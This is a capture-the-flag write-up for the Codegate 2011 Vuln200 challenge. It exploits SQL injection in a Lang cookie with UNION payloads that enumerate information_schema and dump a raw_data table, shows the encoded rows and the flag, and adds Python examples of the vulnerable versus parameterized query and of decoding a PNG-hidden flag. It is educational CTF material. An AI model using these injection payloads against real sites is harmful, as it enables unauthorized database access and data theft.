

[Codegate 2011] Vuln200



When logged in with a normal account: <!-- hint 0 -->

Hint1) The flag is hash string.
Hint2) Get Administrator account



When logged in as Administrator/a: <!-- hint 1-->

Sending the Lang cookie empty or with a quote in it produces an SQL error: SQL injection.





'union select (select group_concat(table_name) from information_schema.tables),1#

'union select (select * from raw_data),1#                   //x
'union select (select * from raw_data limit 0,1),1# //x
'union select (select group_concat(database(),0x3a,user())),1# //x

'union select (select column_name from information_schema.columns where table_name='raw_data' limit 0,1),1# //data_id
'union select (select column_name from information_schema.columns where table_name='raw_data' limit 1,1),1# //data_value
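To show the mechanism behind the error and the union queries above, here is an added Python example (not part of the original writeup) that rebuilds a toy version of the cookie lookup in SQLite: the Lang cookie spliced into the SQL string beside the parameterized version. The table raw_data(data_id, data_value) follows the page; the lang table, its contents and the row values are constructed placeholders, and the page's MySQL '#' comment is swapped for SQLite's '-- ' so the same payload runs here.

```python
import sqlite3

# Constructed stand-in for the challenge database. raw_data(data_id, data_value)
# follows the page; the lang table and all row values are placeholders.
SCHEMA = """
CREATE TABLE lang(code TEXT PRIMARY KEY, label TEXT);
INSERT INTO lang VALUES ('en', 'English'), ('ko', 'Korean');
CREATE TABLE raw_data(data_id INTEGER PRIMARY KEY, data_value TEXT);
INSERT INTO raw_data VALUES (0, 'MTEz.row0.placeholder'), (1, 'MTU5.row1.placeholder');
"""


def open_db():
    con = sqlite3.connect(":memory:")
    con.executescript(SCHEMA)
    return con


def lookup_lang_vulnerable(lang_cookie):
    """The bug the page describes: the Lang cookie is spliced into the SQL text,
    so a quote breaks the statement and a UNION appends attacker-chosen rows."""
    con = open_db()
    sql = "SELECT label, code FROM lang WHERE code = '%s'" % lang_cookie
    return con.execute(sql).fetchall()


def lookup_lang_parameterized(lang_cookie):
    """The fix: the cookie is bound as a value, so it can never become SQL syntax."""
    con = open_db()
    return con.execute("SELECT label, code FROM lang WHERE code = ?", (lang_cookie,)).fetchall()


def raises_sql_error(lookup, lang_cookie):
    """True if the lookup errors on this cookie value (the symptom the author spotted)."""
    try:
        lookup(lang_cookie)
    except sqlite3.OperationalError:
        return True
    return False


# The page's first data-extraction payload, with MySQL's '#' comment replaced by
# SQLite's '-- ' so the same idea runs against the toy database above.
UNION_PAYLOAD = "' union select (select data_value from raw_data limit 0,1),1 -- "


if __name__ == "__main__":
    print(lookup_lang_vulnerable("en"))                       # [('English', 'en')]
    print(raises_sql_error(lookup_lang_vulnerable, "'"))      # True
    print(raises_sql_error(lookup_lang_parameterized, "'"))   # False
    print(lookup_lang_vulnerable(UNION_PAYLOAD))              # row 0 of raw_data leaks
    print(lookup_lang_parameterized(UNION_PAYLOAD))           # []
```

The quote probe is what gives the bug away: the vulnerable lookup throws, the parameterized one just returns no rows. With the bound parameter the whole union payload is compared as a literal code value, so nothing from raw_data can ride along in the result set.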



Going through data_value, every row up to the 20th is junk.

'union select (select data_value from raw_data limit 0,1),1#

MTEzNTk3NzI3MTMxMTQ0MjkzOTcxNjgyNDkyNDg2Mzg3NjM2MzE4MTExMjI1NTM0ODMxODg5OTI5MjU3ODg1NjQ4Mjc4M

Tc4MTkxNjU0MTM2MTE0MTE2OTMyNjE5MjY0OTgyNzk5NjE4NzYzMTY1Njc2MTc2Njc4NzQ5NzU2MjU1MzM0Mzg0MTYxND

Y2OTM0NTMyMTk4ODYyNzQ3NDUyODg0MjEzNTI5NjY1MjU4NjkyNzkxNjg3ODY=

 

11359772713114429397168249248638763631811122553483188992925788564827817819165413611411693261926498279961876316567

617667874975625533438416146693453219886274745288421352966525869279168786

 

5q1B뱱괞$?v61?"U4?뎿뭌늊H'Tai2a?셙놻Vvfxt%S48AaFi4S!'GE(?5)fRXi'x

 

'union select (select data_value from raw_data limit 1,1),1#

MTU5Njc3NTI4NjU0ODQ5NDgyODc3Nzg1NzgxNTU4MTY0OTMyNzczNjQ3OTIxOTU5MjQ2OTE1NDczNTI4NDM1NzM3ODk1Mj

U4ODUxOTU1ODY5NTU5OTk3MzQ5MTgyNTU1MzQ0NzY5NjQ0NjQ4MjM1MTcxMTc5Nzk0NjEyODY3MzgyNzY3NjMyOTk2OD

E4MzI2NDIzMzkzNzY0ODQ5Njc4NzQ1NTE3NjE3Mjg3MTI5NjYyOTgxMzU2NjQ=

 

15967752865484948287778578155816493277364792195924691547352843573789525885195586955999734918255534476964464823517

117979461286738276763299681832642339376484967874551761728712966298135664

 

'union select (select data_value from raw_data limit 2,1),1#

MTY5ODU3MzkyMzc4MzQxMjIxNDE3OTM2ODM4NDk1NzExNzg1NDI1NTQzMzc3NDk5NDQ5MTQzNzI1NTU1OTM1MTk0Nj

M1MTg4NDI2MTU2OTk5OTkzMjY1NzIxMjI0NzIzMTg2NTk0NDM1MTQxNjQ5NTQ5ODU2NDM3NTQ5ODIyMjI5NzY4MjExNzE1

NzY4NzIyNjE3MjU5OTk0ODg1MTk3OTczODk0OTc0NDQxMjIyNDczMTk3OTg2NDc=

 

'union select (select data_value from raw_data limit 3,1),1#

NTk4NTY3Mzg2MjM1ODY4MzY5NDgzMjE0MTc0OTQ3Nzg2NTMyMzUxODczMzY5Mjg2MjM0NTQ0ODUyMjU1ODI0NTc3NzE

zODg5MjI1MTM0NzQ2MTgxNTY2NzgxMjczNjIxMzkxNTc4NTkxMTEzNDc2MTc1MjMyNzk5ODI2Mjc4MjE3MzY1MjE0MjE0N

DUxMTU4NTcyNzUxNjQzMjU5OTcxNjk2MTE2NTM3ODYyODc3NzM0ODk5OTUzMjc=

 

5985673862358683694832141749477865323518733692862345448522558245777138892251347461815667812736213915785911134761

7523279982627821736521421445115857275164325997169611653786287773489995327


 

'union select (select data_value from raw_data limit 4,1),1#

NzI2NTIzNTc0NjQ4ODE2NTM1MjkzNDQxNDM5ODUyNjMzMjg0NTMyODk1Njc2MzI4ODM4MTcyMjE1MjkxMzU0NTcyODI1M

TE0NTcyMTkzOTg2NzgzOTE0NTI0NTQ5OTk3Mjg5Njg5MTM2MjQ2NDM0MTEzMzE0NzU1MTE5MTk4NzE3Njc1NTg4MjkyNz

Q1MjQ1NDc1NzQxMzUxMjU5MTMxNzg3MzQ1MTU1MzM5NzQ0MzgxODU1ODg5ODE=

 

'union select (select data_value from raw_data limit 5,1),1#

NTgyNzg4NjYyOTIyNTY0NzYyMTk0ODkyNDQxMjQ5Mzk4NDY2MzIzNDI0NTYxOTM2MTM2NDI1NjU5Nzc0NjEzNDQ5MTYyND

kzODU5ODQyNTQ1MTg3NjUzNjMxOTkxMzQ0MjQxMzgxNjY2NTUxNzE1MzIzOTc4MjMxMjM5MjUzNjc3Nzk2ODYyNDE3ND

g3ODE5Mjk2MTE5MTMyMTQ3NDE0Mjg0NzY5OTkxNzQ4NTI4NDM4OTQ4OTQyMjU=

 

'union select (select data_value from raw_data limit 6,1),1#

NTg5NjMxNDY4OTY4OTY1MzU5NDQ0NzM0MTEzNTM0MTgzOTQ1OTgyODc3NjY0MTk5MTQzNDI1NzM2MTc5NDg3NzcxMj

c4MzU2MTIzNDIyNDM2Nzc3MzQ5OTQ3ODg1NTUzNTcxNDk1MTE3MzU5NTgyMTU4NzczNzY3NDU1OTkxMjU3Mjg3Nzg3ND

IyNDYxNTc1NDQzNjE5MzU0NzQzODY4NTg2MjY1OTE3MjQ0MjgxNzI1OTg1OTExMzg=

 

....



'union select (select data_value from raw_data limit 20,1),1#

iVBORw0KGgoAAAANSUhEUgAAAAoAAAAKAQAAAAClSfIQAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAIGNIUk0AAHolA

ACAgwAA+f8AAIDpAAB1MAAA6mAAADqYAAAXb5JfxUYAAAAaSURBVHjaYvzPwMTAwMTwkYnhLSOUjUCAAQBVVwPvE

oyQEAAARkxBRzozOTFjZTcwYWQzZGJhODIyNjExY2U1YTYxZWI3MTI1ZQAASUVORK5CYII=




FLAG:391ce80ad3dba822611ce5a61eb7125e
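As an added Python example (not the author's code), here is the decoding step above made repeatable: join the blog-wrapped base64, classify each row (the first rows decode to long decimal strings; the row that starts with iVBORw0KGgo is a PNG, since that is the base64 of the PNG signature), then walk the PNG's chunks with CRC checks and pull the value of a tEXt chunk, falling back to a raw byte search for "FLAG:" when the file has no such chunk or fails to parse. The sample rows are constructed, including a generated PNG with a placeholder flag, rather than the page's own blobs; the digits_to_bytes helper is the author's attempt on the filler rows (reading the decimal as a big integer), which is why those came out as junk.

```python
import base64
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"  # base64-encodes to "iVBORw0KGgo", the prefix seen in row 20


def decode_row(b64_text):
    """Undo the blog's line wrapping, then base64-decode one data_value row."""
    return base64.b64decode("".join(b64_text.split()), validate=True)


def digits_to_bytes(raw):
    """The author's try on the filler rows: read the decimal string as a big-endian integer."""
    n = int(raw)
    return n.to_bytes((n.bit_length() + 7) // 8, "big")


def classify_row(raw):
    """Tell a PNG row from the long-decimal filler rows that occupy rows 0..19 on the page."""
    if raw.startswith(PNG_SIG):
        return "png"
    if raw.isdigit():
        return "digits"
    return "other"


def png_chunks(data):
    """Walk a PNG's chunk list, verifying each CRC. Yields (type, payload); stops at IEND."""
    if not data.startswith(PNG_SIG):
        raise ValueError("not a PNG")
    pos = len(PNG_SIG)
    while pos + 12 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        if pos + 12 + length > len(data):
            raise ValueError("truncated %r chunk (re-wrapped or cut blob?)" % ctype)
        payload = data[pos + 8:pos + 8 + length]
        (crc,) = struct.unpack(">I", data[pos + 8 + length:pos + 12 + length])
        if zlib.crc32(ctype + payload) != crc:
            raise ValueError("bad CRC in %r chunk" % ctype)
        yield ctype, payload
        pos += 12 + length
        if ctype == b"IEND":
            break


def png_text(data):
    """Return {keyword: text} for every tEXt chunk (Latin-1, keyword NUL text)."""
    out = {}
    for ctype, payload in png_chunks(data):
        if ctype == b"tEXt":
            keyword, _, text = payload.partition(b"\x00")
            out[keyword.decode("latin-1")] = text.decode("latin-1")
    return out


def find_flag(rows, keyword="FLAG"):
    """Return the flag text from the first PNG row: a tEXt chunk named `keyword`, or,
    if chunk parsing yields none (or fails), a raw search for 'keyword:' in the bytes."""
    for b64 in rows:
        raw = decode_row(b64)
        if classify_row(raw) != "png":
            continue
        try:
            texts = png_text(raw)
        except ValueError:
            texts = {}
        if keyword in texts:
            return texts[keyword]
        marker = (keyword + ":").encode()
        i = raw.find(marker)
        if i != -1:
            end = raw.find(b"\x00", i)
            return raw[i + len(marker):end if end != -1 else len(raw)].decode("latin-1")
    return None


def _chunk(ctype, payload):
    return struct.pack(">I", len(payload)) + ctype + payload + struct.pack(">I", zlib.crc32(ctype + payload))


def make_png_with_text(keyword, text):
    """Constructed fixture: a 1x1 8-bit grayscale PNG carrying one tEXt chunk."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0)
    idat = zlib.compress(b"\x00\x00")  # one scanline: filter byte + one pixel
    return (PNG_SIG + _chunk(b"IHDR", ihdr)
            + _chunk(b"tEXt", keyword.encode("latin-1") + b"\x00" + text.encode("latin-1"))
            + _chunk(b"IDAT", idat) + _chunk(b"IEND", b""))


# Constructed rows standing in for data_value (not the page's blobs): two filler rows and a PNG.
SAMPLE_ROWS = [
    base64.b64encode(b"113597727131144293971682492486387636318111").decode(),
    base64.b64encode(b"159677528654849482877785781558164932773647").decode(),
    base64.b64encode(make_png_with_text("FLAG", "placeholder_flag_value")).decode(),
]
# A PNG whose flag is only appended as raw bytes after IEND, exercising the fallback path.
SAMPLE_RAW_APPENDED = base64.b64encode(
    make_png_with_text("Comment", "nothing here") + b"FLAG:appended_placeholder\x00").decode()

if __name__ == "__main__":
    for row in SAMPLE_ROWS:
        print(classify_row(decode_row(row)))
    print(find_flag(SAMPLE_ROWS))
```

The CRC check is deliberate: a blob that was wrapped or clipped while being copied out of a blog or a query result will fail it, and the byte search then still recovers anything readable instead of silently returning nothing.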








